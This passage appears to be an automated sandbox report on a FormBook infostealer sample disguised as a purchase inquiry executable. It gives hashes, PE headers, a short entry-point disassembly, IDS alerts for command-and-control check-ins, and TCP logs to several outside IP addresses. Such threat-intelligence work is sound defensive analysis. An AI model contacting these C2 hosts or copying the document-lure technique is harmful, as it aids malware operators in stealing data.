                                                                      msit.msiGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.134.197
                                                                      Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.13.205
                                                                      trow.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      NAMECHEAP-NETUS1001-13.exeGet hashmaliciousFormBookBrowse
                                                                      • 162.0.236.169
                                                                      QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 199.192.23.123
                                                                      rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.23.123
                                                                      plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.23.123
                                                                      5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                      • 63.250.43.134
                                                                      https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 198.54.116.108
                                                                      wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                      • 63.250.43.134
                                                                      OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                      • 63.250.43.134
                                                                      QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.193.6.134
                                                                      No context
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\fc.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):114688
                                                                      Entropy (8bit):0.9746603542602881
                                                                      Encrypted:false
                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.962072249986164
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:CSZ inquiry for MH raw material.exe
                                                                      File size:298'496 bytes
                                                                      MD5:c5c00dae9e7cdd708ec3fdc5238d1577
                                                                      SHA1:94d440e5b4f19b1c8860d1b381cd9259c05773de
                                                                      SHA256:4c778d7518c4e1d2c8065b95dd694672207dc492f338370e89582c00d11084ec
                                                                      SHA512:74287c41472730dad571baefbc235670a78e0e41e8e53d9130ae8a0a33f7c5fd58c1dd60eb9b863f6dcf2798062807156aa55a305fbe072d7c2a9938e6f3f7fb
                                                                      SSDEEP:6144:w8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro+Z:K/dhQJqiOKsPDOZLGeDk3r
                                                                      TLSH:DA54221A5F25F206C1FD2973395F0B427676073DBE592F21B4992CA29990CBF6EC03A1
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...$...............p....@................
                                                                      Icon Hash:246d0d17b3315458
                                                                      Entrypoint:0x401580
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:
                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000424h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 0000040Ch
                                                                      lea eax, dword ptr [ebp-00000420h]
                                                                      push 00000000h
                                                                      push eax
                                                                      mov dword ptr [ebp-00000424h], 00000000h
                                                                      call 00007F4CCD230DACh
                                                                      add esp, 0Ch
                                                                      sub ecx, ecx
                                                                      xor edi, edi
                                                                      sub esi, esi
                                                                      mov dword ptr [ebp-14h], 00000054h
                                                                      mov dword ptr [ebp-10h], 00003B15h
                                                                      mov dword ptr [ebp-0Ch], 00001B0Dh
                                                                      mov dword ptr [ebp-08h], 00004BD2h
                                                                      pushad
                                                                      popad
                                                                      inc ecx
                                                                      mov eax, ecx
                                                                      and eax, 80000007h
                                                                      jns 00007F4CCD22F1B7h
                                                                      dec eax
                                                                      or eax, FFFFFFF8h
                                                                      inc eax
                                                                      jne 00007F4CCD22F1B4h
                                                                      add ecx, ecx
                                                                      cmp ecx, 00000CB4h
                                                                      jl 00007F4CCD22F197h
                                                                      mov ecx, 00006ACDh
                                                                      mov eax, 92492493h
                                                                      imul ecx
                                                                      add edx, ecx
                                                                      sar edx, 05h
                                                                      push edx
                                                                      pop ecx
                                                                      shr ecx, 1Fh
                                                                      add ecx, edx
                                                                      jne 00007F4CCD22F19Dh
                                                                      mov eax, 00001819h
                                                                      push 0000001Bh
                                                                      pop edx
                                                                      nop
                                                                      nop
                                                                      mov ecx, 000000C2h
                                                                      cmp ecx, edx
                                                                      cmovl ecx, edx
                                                                      dec eax
                                                                      jne 00007F4CCD22F1AAh
                                                                      mov ecx, 00001F5Ah
                                                                      mov eax, 82082083h
                                                                      imul ecx
                                                                      add edx, ecx
                                                                      sar edx, 06h
                                                                      mov ecx, edx
                                                                      shr ecx, 1Fh
                                                                      add ecx, edx
                                                                      jne 00007F4CCD22F19Dh
                                                                      call 00007F4CCD23100Ah
                                                                      mov dword ptr [ebp-5Ch], eax
                                                                      pushad
                                                                      popad
                                                                      inc edi
                                                                      mov eax, 55555556h
                                                                      imul edi
                                                                      Programming Language:
                                                                      • [C++] VS2012 build 50727
                                                                      • [ASM] VS2012 build 50727
                                                                      • [LNK] VS2012 build 50727
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x2358.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x456940x458008315a7d751b8fb19e6d9393d3c1b6013False0.9886219930305755data7.995219603624954IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x470000x23580x24003f5572a8563784d4bacd9fd5cb4b3964False0.9434678819444444data7.754725785414912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x470b40x228dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9710570944036179
                                                                      RT_GROUP_ICON0x493440x14data1.05
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-01-13T09:38:11.146610+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450051154.39.239.23780TCP
                                                                      2025-01-13T09:38:11.146610+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450051154.39.239.23780TCP
                                                                      2025-01-13T09:39:03.273683+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44977847.83.1.9080TCP
                                                                      2025-01-13T09:39:03.273683+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44977847.83.1.9080TCP
                                                                      2025-01-13T09:39:18.851049+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44988984.32.84.3280TCP
                                                                      2025-01-13T09:39:21.401927+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44990584.32.84.3280TCP
                                                                      2025-01-13T09:39:23.982775+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44992184.32.84.3280TCP
                                                                      2025-01-13T09:39:26.531724+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44993884.32.84.3280TCP
                                                                      2025-01-13T09:39:26.531724+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44993884.32.84.3280TCP
                                                                      2025-01-13T09:39:32.204209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449975172.67.182.19880TCP
                                                                      2025-01-13T09:39:34.749835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449993172.67.182.19880TCP
                                                                      2025-01-13T09:39:37.290019+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450010172.67.182.19880TCP
                                                                      2025-01-13T09:39:39.992101+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450011172.67.182.19880TCP
                                                                      2025-01-13T09:39:39.992101+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450011172.67.182.19880TCP
                                                                      2025-01-13T09:39:46.174586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450012134.122.135.4880TCP
                                                                      2025-01-13T09:39:48.711601+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450013134.122.135.4880TCP
                                                                      2025-01-13T09:39:51.292841+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450014134.122.135.4880TCP
                                                                      2025-01-13T09:39:53.823335+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450015134.122.135.4880TCP
                                                                      2025-01-13T09:39:53.823335+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450015134.122.135.4880TCP
                                                                      2025-01-13T09:40:00.335255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016199.192.21.16980TCP
                                                                      2025-01-13T09:40:02.902077+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017199.192.21.16980TCP
                                                                      2025-01-13T09:40:05.471425+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018199.192.21.16980TCP
                                                                      2025-01-13T09:40:08.169783+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450019199.192.21.16980TCP
                                                                      2025-01-13T09:40:08.169783+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450019199.192.21.16980TCP
                                                                      2025-01-13T09:40:14.130001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450020154.197.162.23980TCP
                                                                      2025-01-13T09:40:16.706928+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021154.197.162.23980TCP
                                                                      2025-01-13T09:40:19.375952+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022154.197.162.23980TCP
                                                                      2025-01-13T09:40:21.840343+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450023154.197.162.23980TCP
                                                                      2025-01-13T09:40:21.840343+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450023154.197.162.23980TCP
                                                                      2025-01-13T09:40:27.386966+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002484.32.84.3280TCP
                                                                      2025-01-13T09:40:29.912605+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002584.32.84.3280TCP
                                                                      2025-01-13T09:40:32.466923+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002684.32.84.3280TCP
                                                                      2025-01-13T09:40:35.082669+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002784.32.84.3280TCP
                                                                      2025-01-13T09:40:35.082669+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002784.32.84.3280TCP
                                                                      2025-01-13T09:40:41.535137+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028134.122.135.4880TCP
                                                                      2025-01-13T09:40:44.068393+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029134.122.135.4880TCP
                                                                      2025-01-13T09:40:46.611427+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030134.122.135.4880TCP
                                                                      2025-01-13T09:40:49.173174+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450031134.122.135.4880TCP
                                                                      2025-01-13T09:40:49.173174+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450031134.122.135.4880TCP
                                                                      2025-01-13T09:40:55.740151+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003247.83.1.9080TCP
                                                                      2025-01-13T09:40:58.302766+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003347.83.1.9080TCP
                                                                      2025-01-13T09:41:00.849557+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003447.83.1.9080TCP
                                                                      2025-01-13T09:41:03.473517+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003547.83.1.9080TCP
                                                                      2025-01-13T09:41:03.473517+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003547.83.1.9080TCP
                                                                      2025-01-13T09:41:09.055378+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036188.114.96.380TCP
                                                                      2025-01-13T09:41:11.603557+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037188.114.96.380TCP
                                                                      2025-01-13T09:41:14.168093+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038188.114.96.380TCP
                                                                      2025-01-13T09:41:16.715404+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450039188.114.96.380TCP
                                                                      2025-01-13T09:41:16.715404+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450039188.114.96.380TCP
                                                                      2025-01-13T09:41:30.343663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040199.59.243.22880TCP
                                                                      2025-01-13T09:41:32.880046+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041199.59.243.22880TCP
                                                                      2025-01-13T09:41:35.449592+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450042199.59.243.22880TCP
                                                                      2025-01-13T09:41:37.999455+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450043199.59.243.22880TCP
                                                                      2025-01-13T09:41:37.999455+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450043199.59.243.22880TCP
                                                                      2025-01-13T09:41:43.993299+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004418.139.62.22680TCP
                                                                      2025-01-13T09:41:46.568284+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004518.139.62.22680TCP
                                                                      2025-01-13T09:41:49.092506+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004618.139.62.22680TCP
                                                                      2025-01-13T09:41:51.674007+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45004718.139.62.22680TCP
                                                                      2025-01-13T09:41:51.674007+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004718.139.62.22680TCP
                                                                      2025-01-13T09:41:58.708881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048154.39.239.23780TCP
                                                                      2025-01-13T09:42:01.257990+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049154.39.239.23780TCP
                                                                      2025-01-13T09:42:03.818466+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450050154.39.239.23780TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 13, 2025 09:39:01.676784039 CET4977880192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:39:01.681754112 CET804977847.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:39:01.681837082 CET4977880192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:39:01.758270979 CET4977880192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:39:01.763052940 CET804977847.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:39:03.273442030 CET804977847.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:39:03.273540020 CET804977847.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:39:03.273683071 CET4977880192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:39:03.279150009 CET4977880192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:39:03.284095049 CET804977847.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:39:18.376090050 CET4988980192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:18.380969048 CET804988984.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:18.381066084 CET4988980192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:18.403067112 CET4988980192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:18.407877922 CET804988984.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:18.850661993 CET804988984.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:18.851048946 CET4988980192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:19.912195921 CET4988980192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:19.919392109 CET804988984.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:20.932084084 CET4990580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:20.936906099 CET804990584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:20.937064886 CET4990580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:20.966485023 CET4990580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:20.971389055 CET804990584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:21.401710033 CET804990584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:21.401926994 CET4990580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:22.474792004 CET4990580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:22.479767084 CET804990584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.494851112 CET4992180192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:23.499923944 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.500037909 CET4992180192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:23.518078089 CET4992180192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:23.522939920 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.522989988 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523003101 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523111105 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523123980 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523134947 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523161888 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523174047 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.523186922 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.982677937 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:23.982774973 CET4992180192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:25.021800995 CET4992180192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:25.027362108 CET804992184.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.040646076 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.045506954 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.045599937 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.055457115 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.060406923 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531467915 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531527042 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531560898 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531593084 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531625986 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531658888 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531698942 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531723976 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.531723976 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.531723976 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.531730890 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531768084 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531779051 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.531800032 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:26.531846046 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.536041021 CET4993880192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:39:26.540916920 CET804993884.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:39:31.559345961 CET4997580192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:31.564203024 CET8049975172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:31.564279079 CET4997580192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:31.580159903 CET4997580192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:31.585088015 CET8049975172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:32.203723907 CET8049975172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:32.204132080 CET8049975172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:32.204209089 CET4997580192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:33.084112883 CET4997580192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:34.102632046 CET4999380192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:34.108751059 CET8049993172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:34.108844995 CET4999380192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:34.128910065 CET4999380192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:34.135138988 CET8049993172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:34.749556065 CET8049993172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:34.749761105 CET8049993172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:34.749835014 CET4999380192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:35.630860090 CET4999380192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:36.650105953 CET5001080192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:36.655035973 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.655117989 CET5001080192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:36.670418978 CET5001080192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:36.675401926 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675431967 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675497055 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675524950 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675570965 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675597906 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675645113 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675673008 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:36.675698996 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:37.289658070 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:37.289953947 CET8050010172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:37.290019035 CET5001080192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:38.177797079 CET5001080192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:39.336440086 CET5001180192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:39.341238022 CET8050011172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:39.341314077 CET5001180192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:39.396872997 CET5001180192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:39.401628017 CET8050011172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:39.991668940 CET8050011172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:39.992053986 CET8050011172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:39.992100954 CET5001180192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:39.994323969 CET5001180192.168.2.4172.67.182.198
                                                                      Jan 13, 2025 09:39:40.226766109 CET8050011172.67.182.198192.168.2.4
                                                                      Jan 13, 2025 09:39:45.271867990 CET5001280192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:45.276806116 CET8050012134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:45.276868105 CET5001280192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:45.293178082 CET5001280192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:45.298012972 CET8050012134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:46.174323082 CET8050012134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:46.174374104 CET8050012134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:46.174586058 CET5001280192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:46.802795887 CET5001280192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:47.821502924 CET5001380192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:47.826379061 CET8050013134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:47.826486111 CET5001380192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:47.846576929 CET5001380192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:47.851357937 CET8050013134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:48.711422920 CET8050013134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:48.711544037 CET8050013134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:48.711601019 CET5001380192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:49.349616051 CET5001380192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:50.370266914 CET5001480192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:50.378468990 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.378550053 CET5001480192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:50.399859905 CET5001480192.168.2.4134.122.135.48
